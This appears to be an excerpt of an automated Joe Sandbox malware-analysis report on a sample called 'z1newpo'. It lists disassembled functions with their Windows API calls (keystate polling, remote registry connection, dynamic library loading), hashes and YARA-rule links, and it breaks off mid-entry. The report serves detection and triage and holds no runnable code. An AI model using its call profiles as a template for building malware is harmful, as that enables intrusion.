                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: SysAnimate32
                                                    • API String ID: 0-1011021900
                                                    • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                    • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                    • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                    • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                    Function 00461554 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                      • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                      • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                      • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                      • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                    • GetFocus.USER32 ref: 0046157B
                                                      • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                      • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                    • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                    • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                    • __swprintf.LIBCMT ref: 00461608
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                    • String ID: %s%d
                                                    • API String ID: 2645982514-1110647743
                                                    • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                    • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                    • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                    • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                    Function 00462A31 Relevance: 7.7, APIs: 5, Instructions: 227COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                    • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                    • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                    • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                    Function 004757A7 Relevance: 7.7, APIs: 5, Instructions: 220COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                    • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Process$CloseCountersCurrentHandleOpen
                                                    • String ID:
                                                    • API String ID: 3488606520-0
                                                    • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                    • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                                    • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                    • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                                    Function 0046B4CF Relevance: 7.7, APIs: 5, Instructions: 157registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ConnectRegistry_memmove_wcslen
                                                    • String ID:
                                                    • API String ID: 15295421-0
                                                    • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                    • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                                    • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                    • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                                    Function 00464812 Relevance: 7.6, APIs: 5, Instructions: 145libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                    • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                    • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                    • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$Library$FreeLoad
                                                    • String ID:
                                                    • API String ID: 2449869053-0
                                                    • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                    • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                                    • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                    • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                                    Function 00456391 Relevance: 7.6, APIs: 5, Instructions: 130keyboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCursorPos.USER32(?), ref: 004563A6
                                                    • ScreenToClient.USER32(?,?), ref: 004563C3
                                                    • GetAsyncKeyState.USER32(?), ref: 00456400
                                                    • GetAsyncKeyState.USER32(?), ref: 00456410
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: AsyncState$ClientCursorLongScreenWindow
                                                    • String ID:
                                                    • API String ID: 3539004672-0
                                                    • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                    • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                                    • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                    • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                                    Function 0047D40F Relevance: 7.6, APIs: 5, Instructions: 120sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                    • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                    • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                    • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                    • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Interlocked$DecrementIncrement$Sleep
                                                    • String ID:
                                                    • API String ID: 327565842-0
                                                    • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                    • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                                    • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                    • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                                    Function 0045C3C1 Relevance: 7.6, APIs: 5, Instructions: 118COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                    • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                    • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                    • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: PrivateProfile$SectionWrite$String
                                                    • String ID:
                                                    • API String ID: 2832842796-0
                                                    • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                    • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                                    • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                    • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                                    Function 00441C7B Relevance: 7.6, APIs: 5, Instructions: 108registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                    • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Enum$CloseDeleteOpen
                                                    • String ID:
                                                    • API String ID: 2095303065-0
                                                    • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                    • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                                    • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                    • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                                    Function 00436A0B Relevance: 7.6, APIs: 5, Instructions: 103COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetWindowRect.USER32(?,?), ref: 00436A24
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: RectWindow
                                                    • String ID:
                                                    • API String ID: 861336768-0
                                                    • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                    • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                                    • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                    • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                                    Function 00449555 Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32 ref: 00449598
                                                      • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                    • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                    • _wcslen.LIBCMT ref: 0044960D
                                                    • _wcslen.LIBCMT ref: 0044961A
                                                    • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$_wcslen$_wcspbrk
                                                    • String ID:
                                                    • API String ID: 1856069659-0
                                                    • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                    • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                                    • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                    • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                                    Function 004478AC Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCursorPos.USER32(?), ref: 004478E2
                                                    • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                    • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                    • GetCursorPos.USER32(00000000), ref: 0044796A
                                                    • TrackPopupMenuEx.USER32(016A6500,00000000,00000000,?,?,00000000), ref: 00447991
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CursorMenuPopupTrack$Proc
                                                    • String ID:
                                                    • API String ID: 1300944170-0
                                                    • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                    • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                                    • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                    • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                                    Function 004479A0 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetClientRect.USER32(?,?), ref: 004479CC
                                                    • GetCursorPos.USER32(?), ref: 004479D7
                                                    • ScreenToClient.USER32(?,?), ref: 004479F3
                                                    • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                    • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Client$CursorFromPointProcRectScreenWindow
                                                    • String ID:
                                                    • API String ID: 1822080540-0
                                                    • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                    • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                                    • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                    • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                                    Function 00447BF1 Relevance: 7.6, APIs: 5, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                    • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                    • EndPaint.USER32(?,?), ref: 00447D13
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
